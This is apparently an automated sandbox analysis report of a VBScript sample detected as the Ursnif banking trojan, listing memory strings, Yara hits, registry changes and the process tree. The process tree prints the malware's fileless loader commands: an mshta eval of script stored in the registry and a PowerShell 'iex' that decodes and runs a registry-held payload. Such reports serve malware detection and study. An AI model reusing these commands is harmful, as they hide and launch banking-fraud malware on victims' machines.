Source: explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: powershell.exe, 00000018.00000002.430783857.000002219A643000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000018.00000002.430783857.000002219A643000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000018.00000002.430783857.000002219A643000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000018.00000002.410423008.000002218A7EE000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000018.00000002.430783857.000002219A643000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.278825876.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.414378391.0000000005CB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.278880644.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.278943853.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.290307818.00000000058EB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.656715294.000001FC1383E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.278998864.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.279058924.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.351645434.00000221A3020000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.279111543.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.279035350.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.279086537.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.348938504.0000000005CF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5500, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.278825876.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.414378391.0000000005CB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.278880644.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.278943853.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.290307818.00000000058EB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.656715294.000001FC1383E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.278998864.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.279058924.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.351645434.00000221A3020000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.279111543.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.279035350.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.279086537.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.348938504.0000000005CF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5500, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Show sources

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Source: JeSoTz0An7tn.vbs

Initial sample: Strings found which are bigger than 50

Source: p4xjawzl.dll.26.dr	Static PE information: No import functions for PE file found
Source: c2racwwn.dll.29.dr	Static PE information: No import functions for PE file found

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\explorer.exe

Section loaded: cryptdlg.dll

Source: classification engine

Classification label: mal100.bank.troj.spyw.evad.winVBS@26/41@10/2

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{D26BD006-0919-D4CE-2326-4D4807BAD1FC}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3924:120:WilError_01

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\adobe.url

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\JeSoTz0An7tn.vbs'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\JeSoTz0An7tn.vbs'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6388 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6388 CREDAT:82952 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6388 CREDAT:82958 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\p4xjawzl\p4xjawzl.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES508E.tmp' 'c:\Users\user\AppData\Local\Temp\p4xjawzl\CSCF25F578263E4AA98A5ACFCF8CC63832.TMP'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\c2racwwn\c2racwwn.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5FA2.tmp' 'c:\Users\user\AppData\Local\Temp\c2racwwn\CSC8F1415F2367845AF84D1583CADF7143D.TMP'
Source: unknown	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6388 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6388 CREDAT:82952 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6388 CREDAT:82958 /prefetch:2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\p4xjawzl\p4xjawzl.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\c2racwwn\c2racwwn.cmdline'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES508E.tmp' 'c:\Users\user\AppData\Local\Temp\p4xjawzl\CSCF25F578263E4AA98A5ACFCF8CC63832.TMP'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5FA2.tmp' 'c:\Users\user\AppData\Local\Temp\c2racwwn\CSC8F1415F2367845AF84D1583CADF7143D.TMP'	Jump to behavior
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: C:\Windows\explorer.exe

File opened: C:\Windows\SYSTEM32\msftedit.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001A.00000002.336307813.0000025441A80000.00000002.00000001.sdmp, csc.exe, 0000001D.00000002.346879761.0000023FEEA60000.00000002.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000023.00000000.379921104.0000000006560000.00000002.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000023.00000000.379921104.0000000006560000.00000002.00000001.sdmp

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions

Show sources

Source: C:\Windows\System32\wscript.exe

